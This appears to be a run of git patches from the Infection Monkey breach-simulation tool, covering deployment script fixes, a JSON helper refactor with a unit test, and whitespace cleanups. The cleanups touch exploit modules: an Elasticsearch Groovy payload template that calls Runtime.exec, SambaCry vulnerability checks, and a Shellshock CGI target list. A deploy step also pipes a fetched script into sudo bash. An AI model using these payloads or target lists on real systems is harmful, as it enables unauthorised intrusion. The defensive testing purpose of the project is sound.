-c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} # Download traceroute binaries -log_message "Downloading tracerout binaries" +log_message "Downloading traceroute binaries" wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 26d8c3234..dc1a266de 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then python_cmd="python3.7" fi -./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py +./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db +${python_cmd} ./monkey_island.py diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 956892e23..16bcabf0e 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -22,7 +22,7 @@ How to set up the Monkey Island server: OR 3.b. Use already running instance of mongodb 3.b.1. Run 'set MONKEY_MONGO_URL="mongodb://:27017/monkeyisland"'. Replace '' with address of mongo server - + 4. Place portable version of OpenSSL 4.1. Download from: https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip 4.2. Extract content from bin folder to monkey_island\bin\openssl @@ -56,7 +56,7 @@ How to run: 2. Install the packages from monkey_island/requirements.txt: sudo python -m pip install -r /var/monkey_island/requirements.txt If pip is not installed, install the python-pip package. Make sure the server is running Python 2.7 and not Python 3+. - + 3. put monkey binaries in /var/monkey_island/cc/binaries monkey-linux-64 - monkey binary for linux 64bit monkey-linux-32 - monkey binary for linux 32bit @@ -81,11 +81,11 @@ How to run: 8. Install npm 8.1. Download and install from: https://www.npmjs.com/get-npm - + 9. Build Monkey Island frontend 9.1. cd to 'monkey_island/cc/ui' 9.2. run 'npm update' 9.3. run 'npm run dist' - + How to run: -1. run run.sh (located under /linux) +1. When your current working directory is monkey, run run.sh (located under /linux) From 4457cdc0c83082ff14a39eeae9664ba58d9fe100 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 15:11:58 +0300 Subject: [PATCH 18/53] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps --- deployment_scripts/deploy_linux.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 5e191d5fe..d83d24620 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -69,8 +69,8 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." - sudo apt-get update - sudo apt-get install python3.7 + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" fi From a305611558d8a079075bd54fbf5f130380373113 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 10:02:50 +0300 Subject: [PATCH 19/53] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps --- deployment_scripts/deploy_linux.sh | 8 +++++--- monkey/monkey_island/linux/run.sh | 2 +- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index d83d24620..1c0f7221c 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -118,10 +118,13 @@ sudo apt-get install openssl # Generate SSL certificate log_message "Generating certificate" -sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error -${ISLAND_PATH}/linux/create_certificate.sh || handle_error +cd ${ISLAND_PATH} +openssl genrsa -out cc/server.key 2048 +openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" +openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt # Update node +cd "$ISLAND_PATH/cc/ui" || handle_error log_message "Installing nodejs" sudo apt-get install -y nodejs @@ -131,7 +134,6 @@ sudo apt-get install npm npm update log_message "Generating front end" -cd "$ISLAND_PATH/cc/ui" || handle_error npm run dist # Making dir for binaries diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index dc1a266de..54e1cdd65 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then python_cmd="python3.7" fi -./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db +./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db & ${python_cmd} ./monkey_island.py From 222b9432e8b412b560cc617127eb1fc8c52f2e77 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 11:17:10 +0300 Subject: [PATCH 20/53] fixed front end dependencies --- deployment_scripts/deploy_linux.sh | 8 +++----- monkey/monkey_island/readme.txt | 2 +- 2 files changed, 4 insertions(+), 6 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 1c0f7221c..488911f15 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -124,13 +124,11 @@ openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L= openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt # Update node -cd "$ISLAND_PATH/cc/ui" || handle_error log_message "Installing nodejs" +cd "$ISLAND_PATH/cc/ui" || handle_error +curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - sudo apt-get install -y nodejs - -# Install npm -log_message "Installing npm" -sudo apt-get install npm +npm install sass-loader node-sass webpack --save-dev npm update log_message "Generating front end" diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 16bcabf0e..87b2f8c40 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -88,4 +88,4 @@ How to run: 9.3. run 'npm run dist' How to run: -1. When your current working directory is monkey, run run.sh (located under /linux) +1. When your current working directory is monkey, run ./monkey_island/linux/run.sh (located under /linux) From 1c32ef156a5283ecb733031e14991252bd978f49 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 12:54:00 +0300 Subject: [PATCH 21/53] Improved linux deployment instructions --- deployment_scripts/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 0faf95a52..f69a48b77 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -13,10 +13,11 @@ Don't forget to add python to PATH or do so while installing it via this script. ## Linux +Linux deployment script is meant for Ubuntu 16.x machines. You must have root permissions, but don't run the script as root.
Launch deploy_linux.sh from scripts directory.
-First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username +First argument should be an absolute path of an empty directory (script will create one if doesn't exist, default is ./infection_monkey). +Second parameter is the branch you want to clone (develop by default). Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
From 348a74361977a67ebb8eca62fb1a90923302ca82 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 10:28:40 +0200 Subject: [PATCH 22/53] Extracted api representations hooks to separate file, added UT, and fixed linter issue use `x not in y` instead of `not x in y`. --- monkey/monkey_island/cc/app.py | 32 +---------- .../cc/resources/representations.py | 31 +++++++++++ .../cc/resources/representations_test.py | 53 +++++++++++++++++++ 3 files changed, 86 insertions(+), 30 deletions(-) create mode 100644 monkey/monkey_island/cc/resources/representations.py create mode 100644 monkey/monkey_island/cc/resources/representations_test.py diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 38af31bde..8ab61c895 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -1,11 +1,8 @@ import os import uuid -from datetime import datetime -import bson import flask_restful -from bson.json_util import dumps -from flask import Flask, send_from_directory, make_response, Response +from flask import Flask, send_from_directory, Response from werkzeug.exceptions import NotFound from monkey_island.cc.auth import init_jwt @@ -24,6 +21,7 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report +from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed @@ -62,32 +60,6 @@ def serve_home(): return serve_static_file(HOME_FILE) -def normalize_obj(obj): - if '_id' in obj and not 'id' in obj: - obj['id'] = obj['_id'] - del obj['_id'] - - for key, value in list(obj.items()): - if isinstance(value, bson.objectid.ObjectId): - obj[key] = str(value) - if isinstance(value, datetime): - obj[key] = str(value) - if isinstance(value, dict): - obj[key] = normalize_obj(value) - if isinstance(value, list): - for i in range(0, len(value)): - if isinstance(value[i], dict): - value[i] = normalize_obj(value[i]) - return obj - - -def output_json(obj, code, headers=None): - obj = normalize_obj(obj) - resp = make_response(dumps(obj), code) - resp.headers.extend(headers or {}) - return resp - - def init_app_config(app, mongo_url): app.config['MONGO_URI'] = mongo_url app.config['SECRET_KEY'] = str(uuid.getnode()) diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/resources/representations.py new file mode 100644 index 000000000..cd804db50 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations.py @@ -0,0 +1,31 @@ +from datetime import datetime + +import bson +from bson.json_util import dumps +from flask import make_response + + +def normalize_obj(obj): + if ('_id' in obj) and ('id' not in obj): + obj['id'] = obj['_id'] + del obj['_id'] + + for key, value in list(obj.items()): + if isinstance(value, bson.objectid.ObjectId): + obj[key] = str(value) + if isinstance(value, datetime): + obj[key] = str(value) + if isinstance(value, dict): + obj[key] = normalize_obj(value) + if isinstance(value, list): + for i in range(0, len(value)): + if isinstance(value[i], dict): + value[i] = normalize_obj(value[i]) + return obj + + +def output_json(obj, code, headers=None): + obj = normalize_obj(obj) + resp = make_response(dumps(obj), code) + resp.headers.extend(headers or {}) + return resp diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/resources/representations_test.py new file mode 100644 index 000000000..714c70ed2 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations_test.py @@ -0,0 +1,53 @@ +from unittest import TestCase +from datetime import datetime +from .representations import normalize_obj + +import bson + + +class TestJsonRepresentations(TestCase): + def test_normalize_obj(self): + # empty + self.assertEqual({}, normalize_obj({})) + + # no special content + self.assertEqual( + {"a": "a"}, + normalize_obj({"a": "a"}) + ) + + # _id field -> id field + self.assertEqual( + {"id": 12345}, + normalize_obj({"_id": 12345}) + ) + + # obj id field -> str + obj_id_str = "123456789012345678901234" + self.assertEqual( + {"id": obj_id_str}, + normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) + ) + + # datetime -> str + dt = datetime.now() + expected = {"a": str(dt)} + result = normalize_obj({"a": dt}) + self.assertEqual(expected, result) + + # dicts and lists + self.assertEqual({ + "a": [ + {"ba": obj_id_str, + "bb": obj_id_str} + ], + "b": {"id": obj_id_str} + }, + normalize_obj({ + "a": [ + {"ba": bson.objectid.ObjectId(obj_id_str), + "bb": bson.objectid.ObjectId(obj_id_str)} + ], + "b": {"_id": bson.objectid.ObjectId(obj_id_str)} + }) + ) From d6544c9e03f29338c2a97d7808204a9a0424bb11 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 12:59:32 +0200 Subject: [PATCH 23/53] Whitespace PEP8 fixes --- monkey/infection_monkey/exploit/__init__.py | 12 ++++++------ monkey/monkey_island/cc/services/__init__.py | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 9e899b140..e2b75a4dd 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py @@ -20,11 +20,11 @@ class HostExploiter(object, metaclass=ABCMeta): def __init__(self, host): self._config = infection_monkey.config.WormConfiguration self.exploit_info = {'display_name': self._EXPLOITED_SERVICE, - 'started': '', - 'finished': '', - 'vulnerable_urls': [], - 'vulnerable_ports': [], - 'executed_cmds': []} + 'started': '', + 'finished': '', + 'vulnerable_urls': [], + 'vulnerable_ports': [], + 'executed_cmds': []} self.exploit_attempts = [] self.host = host @@ -43,7 +43,7 @@ class HostExploiter(object, metaclass=ABCMeta): def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''): self.exploit_attempts.append({'result': result, 'user': user, 'password': password, - 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key}) + 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key}) def exploit_host(self): self.pre_exploit() diff --git a/monkey/monkey_island/cc/services/__init__.py b/monkey/monkey_island/cc/services/__init__.py index 142e51368..ee5b79ad0 100644 --- a/monkey/monkey_island/cc/services/__init__.py +++ b/monkey/monkey_island/cc/services/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' \ No newline at end of file +__author__ = 'itay.mizeretz' From cd3835a42e1bdf178f9f671fdc8e081eb7c1030f Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:14:52 +0200 Subject: [PATCH 24/53] Whitespace and imports fixes --- monkey/common/cloud/aws_instance.py | 4 +- monkey/common/cmd/aws/aws_cmd_runner.py | 2 +- monkey/common/data/zero_trust_consts.py | 30 +- monkey/common/utils/code_utils.py | 2 + .../infection_monkey/exploit/elasticgroovy.py | 6 +- monkey/infection_monkey/exploit/sambacry.py | 19 +- .../exploit/shellshock_resources.py | 808 +++++++++--------- monkey/infection_monkey/exploit/struts2.py | 7 +- .../exploit/tools/http_tools.py | 8 +- monkey/infection_monkey/exploit/wmiexec.py | 3 +- monkey/infection_monkey/main.py | 9 +- monkey/infection_monkey/model/__init__.py | 9 +- monkey/infection_monkey/monkeyfs.py | 1 - monkey/infection_monkey/network/firewall.py | 7 +- monkey/infection_monkey/network/httpfinger.py | 2 +- .../infection_monkey/network/ping_scanner.py | 15 +- monkey/infection_monkey/network/smbfinger.py | 10 +- .../infection_monkey/network/tcp_scanner.py | 3 +- .../system_info/SSH_info_collector.py | 2 +- monkey/infection_monkey/transport/base.py | 2 +- monkey/monkey_island/cc/models/test_monkey.py | 2 +- monkey/monkey_island/cc/resources/root.py | 8 +- .../cc/services/attack/attack_report.py | 5 +- monkey/monkey_island/cc/services/config.py | 15 +- .../cc/services/remote_run_aws.py | 2 +- .../cc/services/reporting/aws_exporter.py | 107 ++- .../cc/services/reporting/pth_report.py | 21 +- monkey/monkey_island/cc/utils.py | 11 +- 28 files changed, 593 insertions(+), 527 deletions(-) diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py index ac4fe633e..5178b0938 100644 --- a/monkey/common/cloud/aws_instance.py +++ b/monkey/common/cloud/aws_instance.py @@ -29,8 +29,8 @@ class AwsInstance(object): self.instance_id = urllib.request.urlopen( AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode() self.region = self._parse_region( - urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read(). - decode()) + urllib.request.urlopen( + AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode()) except (urllib.error.URLError, IOError) as e: logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e)) diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py index 9745d2c1d..459a42129 100644 --- a/monkey/common/cmd/aws/aws_cmd_runner.py +++ b/monkey/common/cmd/aws/aws_cmd_runner.py @@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner): Class for running commands on a remote AWS machine """ - def __init__(self, is_linux, instance_id, region = None): + def __init__(self, is_linux, instance_id, region=None): super(AwsCmdRunner, self).__init__(is_linux) self.instance_id = instance_id self.region = region diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py index 5ac5dd78d..ae27b1c35 100644 --- a/monkey/common/data/zero_trust_consts.py +++ b/monkey/common/data/zero_trust_consts.py @@ -68,7 +68,8 @@ FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation" TEST_EXPLANATION_KEY = "explanation" TESTS_MAP = { TEST_SEGMENTATION: { - TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.", + TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's " + "running on, that belong to different network segments.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.", STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs." @@ -78,7 +79,8 @@ TESTS_MAP = { POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED] }, TEST_MALICIOUS_ACTIVITY_TIMELINE: { - TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.", + TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting " + "exploitation.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts." }, @@ -89,8 +91,10 @@ TESTS_MAP = { TEST_ENDPOINT_SECURITY_EXISTS: { TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.", - STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern." + STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus " + "software on endpoints.", + STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a " + "security concern. " }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PILLARS_KEY: [DEVICES], @@ -99,7 +103,8 @@ TESTS_MAP = { TEST_MACHINE_EXPLOITED: { TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.", + STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see " + "which endpoints were compromised.", STATUS_PASSED: "Monkey didn't manage to exploit an endpoint." }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, @@ -109,7 +114,8 @@ TESTS_MAP = { TEST_SCHEDULED_EXECUTION: { TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.", + STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security " + "software.", STATUS_PASSED: "Monkey failed to execute in a scheduled manner." }, PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR, @@ -120,7 +126,8 @@ TESTS_MAP = { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.", - STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them." + STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts " + "that indicate attempts to access them. " }, PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT, PILLARS_KEY: [DATA], @@ -130,7 +137,8 @@ TESTS_MAP = { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.", - STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them." + STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate " + "attempts to access them. " }, PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT, PILLARS_KEY: [DATA], @@ -139,7 +147,8 @@ TESTS_MAP = { TEST_TUNNELING: { TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them." + STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - " + "restrict them. " }, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS], @@ -148,7 +157,8 @@ TESTS_MAP = { TEST_COMMUNICATE_AS_NEW_USER: { TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.", + STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - " + "restrict them to MAC only.", STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network." }, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py index d6d407706..b50e01fb0 100644 --- a/monkey/common/utils/code_utils.py +++ b/monkey/common/utils/code_utils.py @@ -1,10 +1,12 @@ # abstract, static method decorator +# noinspection PyPep8Naming class abstractstatic(staticmethod): __slots__ = () def __init__(self, function): super(abstractstatic, self).__init__(function) function.__isabstractmethod__ = True + __isabstractmethod__ = True diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index f1057f2dd..c8f897dd2 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE): # attack URLs MONKEY_RESULT_FIELD = "monkey_result" GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD - JAVA_CMD = GENERIC_QUERY \ - % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + JAVA_CMD = \ + GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" _TARGET_OS_TYPE = ['linux', 'windows'] _EXPLOITED_SERVICE = 'Elastic search' @@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config['dropper'] = True exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP} + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP} return exploit_config def get_open_service_ports(self, port_list, names): diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index e48a21616..3c12ab843 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -230,13 +230,13 @@ class SambaCryExploiter(HostExploiter): elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and ( - samba_version_parts[1] <= "13"): + samba_version_parts[1] <= "13"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and ( - samba_version_parts[1] <= "9"): + samba_version_parts[1] <= "9"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and ( - samba_version_parts[1] <= "3"): + samba_version_parts[1] <= "3"): is_vulnerable = True else: # If pattern doesn't match we can't tell what version it is. Better try @@ -448,7 +448,12 @@ class SambaCryExploiter(HostExploiter): return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) else: - return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, - shareMode=FILE_SHARE_READ, - creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, - fileAttributes=0) + return SambaCryExploiter.create_smb( + smb_client, + treeId, + pathName, + desiredAccess=FILE_READ_DATA, + shareMode=FILE_SHARE_READ, + creationOptions=FILE_OPEN, + creationDisposition=FILE_NON_DIRECTORY_FILE, + fileAttributes=0) diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py index 10cfc75a6..46851dde1 100644 --- a/monkey/infection_monkey/exploit/shellshock_resources.py +++ b/monkey/infection_monkey/exploit/shellshock_resources.py @@ -1,406 +1,408 @@ # resource for shellshock attack # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list -CGI_FILES = (r'/', - r'/admin.cgi', - r'/administrator.cgi', - r'/agora.cgi', - r'/aktivate/cgi-bin/catgy.cgi', - r'/analyse.cgi', - r'/apps/web/vs_diag.cgi', - r'/axis-cgi/buffer/command.cgi', - r'/b2-include/b2edit.showposts.php', - r'/bandwidth/index.cgi', - r'/bigconf.cgi', - r'/cartcart.cgi', - r'/cart.cgi', - r'/ccbill/whereami.cgi', - r'/cgi-bin/14all-1.1.cgi', - r'/cgi-bin/14all.cgi', - r'/cgi-bin/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp4.cgi', - r'/cgi-bin/addbanner.cgi', - r'/cgi-bin/add_ftp.cgi', - r'/cgi-bin/adduser.cgi', - r'/cgi-bin/admin/admin.cgi', - r'/cgi-bin/admin.cgi', - r'/cgi-bin/admin/getparam.cgi', - r'/cgi-bin/adminhot.cgi', - r'/cgi-bin/admin.pl', - r'/cgi-bin/admin/setup.cgi', - r'/cgi-bin/adminwww.cgi', - r'/cgi-bin/af.cgi', - r'/cgi-bin/aglimpse.cgi', - r'/cgi-bin/alienform.cgi', - r'/cgi-bin/AnyBoard.cgi', - r'/cgi-bin/architext_query.cgi', - r'/cgi-bin/astrocam.cgi', - r'/cgi-bin/AT-admin.cgi', - r'/cgi-bin/AT-generate.cgi', - r'/cgi-bin/auction/auction.cgi', - r'/cgi-bin/auktion.cgi', - r'/cgi-bin/ax-admin.cgi', - r'/cgi-bin/ax.cgi', - r'/cgi-bin/axs.cgi', - r'/cgi-bin/badmin.cgi', - r'/cgi-bin/banner.cgi', - r'/cgi-bin/bannereditor.cgi', - r'/cgi-bin/bb-ack.sh', - r'/cgi-bin/bb-histlog.sh', - r'/cgi-bin/bb-hist.sh', - r'/cgi-bin/bb-hostsvc.sh', - r'/cgi-bin/bb-replog.sh', - r'/cgi-bin/bb-rep.sh', - r'/cgi-bin/bbs_forum.cgi', - r'/cgi-bin/bigconf.cgi', - r'/cgi-bin/bizdb1-search.cgi', - r'/cgi-bin/blog/mt-check.cgi', - r'/cgi-bin/blog/mt-load.cgi', - r'/cgi-bin/bnbform.cgi', - r'/cgi-bin/book.cgi', - r'/cgi-bin/boozt/admin/index.cgi', - r'/cgi-bin/bsguest.cgi', - r'/cgi-bin/bslist.cgi', - r'/cgi-bin/build.cgi', - r'/cgi-bin/bulk/bulk.cgi', - r'/cgi-bin/cached_feed.cgi', - r'/cgi-bin/cachemgr.cgi', - r'/cgi-bin/calendar/index.cgi', - r'/cgi-bin/cartmanager.cgi', - r'/cgi-bin/cbmc/forums.cgi', - r'/cgi-bin/ccvsblame.cgi', - r'/cgi-bin/c_download.cgi', - r'/cgi-bin/cgforum.cgi', - r'/cgi-bin/.cgi', - r'/cgi-bin/cgi_process', - r'/cgi-bin/classified.cgi', - r'/cgi-bin/classifieds.cgi', - r'/cgi-bin/classifieds/classifieds.cgi', - r'/cgi-bin/classifieds/index.cgi', - r'/cgi-bin/.cobalt/alert/service.cgi', - r'/cgi-bin/.cobalt/message/message.cgi', - r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', - r'/cgi-bin/commandit.cgi', - r'/cgi-bin/commerce.cgi', - r'/cgi-bin/common/listrec.pl', - r'/cgi-bin/compatible.cgi', - r'/cgi-bin/Count.cgi', - r'/cgi-bin/csChatRBox.cgi', - r'/cgi-bin/csGuestBook.cgi', - r'/cgi-bin/csLiveSupport.cgi', - r'/cgi-bin/CSMailto.cgi', - r'/cgi-bin/CSMailto/CSMailto.cgi', - r'/cgi-bin/csNews.cgi', - r'/cgi-bin/csNewsPro.cgi', - r'/cgi-bin/csPassword.cgi', - r'/cgi-bin/csPassword/csPassword.cgi', - r'/cgi-bin/csSearch.cgi', - 